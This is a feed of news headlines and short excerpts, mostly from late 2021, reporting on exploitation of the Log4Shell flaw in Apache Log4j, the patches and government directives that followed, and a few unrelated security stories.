As of yesterday, Patch Tuesday, the German software maker reported that it’s already patched 20 of those apps, and it’s still feverishly working on fixes for 12. SAP provided workarounds for some of the pending patches in this document, accessible to users on the company’s support portal.
...

Apache’s Fix for Log4Shell Can Lead to DoS Attacks
Threatpost • Elizabeth Montalbano • 15 Dec 2021

As if finding one easily exploited and extremely dangerous flaw in the ubiquitous Java logging library Apache Log4j hadn’t already turned the Internet security community on its ear, researchers now have found a new vulnerability in Apache’s patch issued to mitigate it.
Last Thursday security researchers began warning that a vulnerability tracked as CVE-2021-44228 in Apache Log4j was under active attack and had the potential, according to many reports, to break the internet. Dubbed Log4...

As CISA tells US govt agencies to squash Log4j bug by Dec 24, fingers start pointing at China, Iran, others
The Register • Chris Williams, Editor in Chief • 15 Dec 2021

Microsoft says cyber-spies linked to Beijing, Tehran are getting busy with security flaw along with world + dog

Microsoft reckons government cyber-spies in China, Iran, North Korea, and Turkey are actively exploiting the Log4j 2.x remote-code execution hole.
Up until now, it was largely accepted that mere private miscreants, criminal gangs, and security researchers were mostly scanning the internet for systems and services vulnerable to CVE-2021-44228 in the open-source logging library widely used by Java applications. Network observers say they've seen tens of thousands of attempts per minute. Succ...

Log4j vulnerability now used by state-backed hackers, access brokers
BleepingComputer • Ionut Ilascu • 15 Dec 2021

As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging library.
Also known as Log4Shell or LogJam, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.
Among the first threat actors to leverage Log4Shell to drop payloads are cryptocurren...

What the Log4Shell Bug Means for SMBs: Experts Weigh In
Threatpost • Tara Seals • 14 Dec 2021

News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an “internet meltdown,” as well as the “worst cybersecurity bug of the year.” Names like “Apple,” “Twitter” and “Cloudflare” are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?
We asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs i...

Apache takes off, nukes insecure feature at the heart of Log4j from orbit with v2.16
The Register • Gareth Corfield • 14 Dec 2021

Now open-source logging library's JNDI disabled entirely by default, message lookups removed

Last week, version 2.15 of the widely used open-source logging library Log4j was released to tackle a critical security hole, dubbed Log4Shell, which could be trivially abused by miscreants to hijack servers and apps over the internet.
However, that release only partially closed the hole (CVE-2021-44228) by disabling by default one aspect of the Java library's exploitable functionality – JNDI message lookups. Now version 2.16 is out, and it disables all of JNDI support by default, and re...

Popular password manager LastPass to be spun out from LogMeIn
The Register • Jude Karabus • 14 Dec 2021

Private equity owners play pass the parcel

One of the biggest beasts in the password management world, LastPass, is being spun out from parent LogMeIn as a "standalone cloud security" organisation.
"The success we've seen across the entire LogMeIn portfolio over the last 18 months proves there is a vast growth opportunity ahead for both LastPass and LogMeIn," said Andrew Kowal, a partner at Francisco Partners.
Francisco Partners, a private equity business, bought the bundle of remote access, collab and password manager tools ...

Log4Shell vulnerability: What we know so far
welivesecurity • 13 Dec 2021

Just as the holiday season is approaching our doorstep, a critical vulnerability in an Apache code library called Log4j 2 has come knocking at the door. Log4j is an open-source Java-based logging library that is widely used by many products, services and Java components. It’s little surprise that the flaw, which scored a perfect 10 on the CVSS scale and is putting countless servers at risk of complete takeover, has sent shockwaves far beyond the security industry.
Indeed, with proof of c...

Where the Latest Log4Shell Attacks Are Coming From
Threatpost • Becky Bracken • 13 Dec 2021

Cybersecurity professionals across the world have been scrambling to shore up their systems against a critical remote code-execution (RCE) flaw (CVE-2021-44228) in the Apache Log4j tool, discovered just days ago.
Now under active exploit, the “Log4Shell” bug allows complete server takeover. Researchers have started to fill in the details on the latest Log4Shell attacks, and they reported finding at least 10 specific Linux botnets leading the charge.

First, analysts at Net...

Log4Shell Is Spawning Even Nastier Mutations
Threatpost • Lisa Vaas • 13 Dec 2021

The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.
Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.
According to Micros...

Log4j RCE latest: In case you hadn't noticed, this is Really Very Bad, exploited in the wild, needs urgent patching
The Register • Gareth Corfield • 13 Dec 2021

This might be the bug that deserves the website, logo and book deal

Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.
Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.
Apache Log4j is an open-source logging utility written in Java that is used all over the world in many sof...

Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack
Threatpost • Lisa Vaas • 10 Dec 2021

An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s being exploited in the wild.
The flaw first turned up on sites that cater to users of the world’s favorite game, Minecraft, on Thursday. The sites reportedly warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messa...

New zero-day exploit for Log4j Java library is an enterprise nightmare
BleepingComputer • Sergiu Gatlan • 10 Dec 2021

Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to remote code execution attacks.
Log4j is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
Thus, while home users might have moved on from Java, anything from enterprise software to cloud software such as Apple's iCloud and Steam is likely vuln...

Log4j RCE: Emergency patch issued to plug critical auth-free code execution hole in widely-used logging utility
The Register • Gareth Corfield • 10 Dec 2021

Prepare to have a very busy weekend of mitigating and patching

An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers.
Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation."
Crafted proof-of-concept ...

Minecraft rushes out patch for critical Log4j vulnerability
BleepingComputer • Sergiu Gatlan • 10 Dec 2021

Swedish video game developer Mojang Studios has released an emergency Minecraft security update to address a critical bug in the Apache Log4j Java logging library used by the game's Java Edition client and multiplayer servers.
The vulnerability is fixed with the release of 
, which is now rolling out to all customers.
"This release fixes a critical security issue for multiplayer servers, changes how the world fog works to make more of the world visible, and fixes a couple of ...

Five Eyes nations reveal 2021's fifteen most-exploited flaws
The Register • Jessica Lyons Hardcastle

Malicious cyber actors go after 2021's biggest misses, spend less time on the classics

Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021, according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies.
It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years.
Of course...

All Log4j, logback bugs we know so far and why you MUST ditch 2.15
BleepingComputer • Ax Sharma

Everyone's heard of the critical log4j zero-day by now. Dubbed 'Log4Shell' and 'Logjam,' the vulnerability has set the internet on fire.
Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from 
 to 
 and others to 
 on vulnerable systems.
Log4j usage is rampant among many software products and multiple 
have since surfaced. And, it now seems, 'logback' isn't all that immune either.
Below...

Amazon Web Services fixes container escape in Log4Shell hotfix
BleepingComputer • Bill Toulas

Amazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j logging library or containers.
The hot patch packages from Amazon are not exclusive to AWS resources and allowed escaping a container in the environment and taking control of the host. The flaws could als...

FTC warns companies to secure consumer data from Log4J attacks
BleepingComputer • Sergiu Gatlan

The US Federal Trade Commission (FTC) has warned today that it will go after any US company that fails to protect its customers' data against ongoing Log4J attacks.
"The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future," the US government agency 
.
"The duty to take reasonable steps to mitigate known software vulnerabilit...

Lazarus hackers target VMware servers with Log4Shell exploits
BleepingComputer • Bill Toulas

The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.
The vulnerability is tracked as CVE-2021-44228, aka 
, and impacts many products, including VMware Horizon.
The exploitation of vulnerable Horizon deployments
, but many admins are yet to apply the available security updates.
According to a report published by analyst...

State hackers use new PowerShell backdoor in Log4j attacks
BleepingComputer • Bill Toulas

Hackers believed to be part of the Iranian APT35 state-backed group (aka 'Charming Kitten' or 'Phosphorus') have been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor.
The modular payload can handle C2 communications, perform system enumeration, and eventually receive, decrypt, and load additional modules.
Log4Shell is an exploit for CVE-2021-44228, a critical remote code execution vulnerability in Apache Log4j disclosed in December.
According to research...

Log4shell exploits now used mostly for DDoS botnets, cryptominers
BleepingComputer • Bill Toulas

The Log4Shell vulnerabilities in the widely used Log4j software are still leveraged by threat actors today to deploy various malware payloads, including recruiting devices into DDoS botnets and for planting cryptominers.
According to a report by Barracuda, the past couple of months were characterized by dips and spikes in the targeting of Log4Shell, but the volume of exploitation attempts has remained relatively constant.
After analyzing these attacks, Barracuda determined that ...

Triton malware still a threat to energy sector, FBI warns
The Register • Jessica Lyons Hardcastle

Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad

In Brief: Triton malware remains a threat to the global energy sector, according to an FBI warning.
Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility.
The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and ...

CISA orders federal agencies to patch Log4Shell by December 24th
BleepingComputer • Sergiu Gatlan

The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell vulnerability and released mitigation guidance in response to active exploitation.
This follows threat actors' head start in scanning for and
to deploy malware.
Even though Apache quickly released a patch to address the maximum severity remote code execution flaw (CVE-2021-44228)
, it only happened after attackers began deploying the ...

CISA releases Apache Log4j scanner to find vulnerable apps
BleepingComputer • Sergiu Gatlan

The Cybersecurity and Infrastructure Security Agency (CISA) has
the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.
"log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities," the cybersecurity agency

Hackers target Russian govt with fake Windows updates pushing RATs
BleepingComputer • Bill Toulas

Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.
The attacks are being conducted by a previously undetected APT (advanced persistent threat) group believed to be operating from China, who are linked to four separate spear-phishing campaigns.
These operations spanned between February and April 2022, coinciding with the Russian invasion of Ukraine. Its targets have been g...

US orders federal govt agencies to patch critical Log4j bug
BleepingComputer • Sergiu Gatlan

US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.
The order comes through an emergency directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) today.
This is not surprising given the risk the ongoing exploitation of this vulnerability poses and seeing that the security flaw (tracked as CVE-2021-44228) has also 

VMware Horizon platform pummeled by Log4j-fueled attacks
The Register • Jeff Burt

Miscreants deployed cryptominers, backdoors since late December, Sophos says

VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.
In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos re...
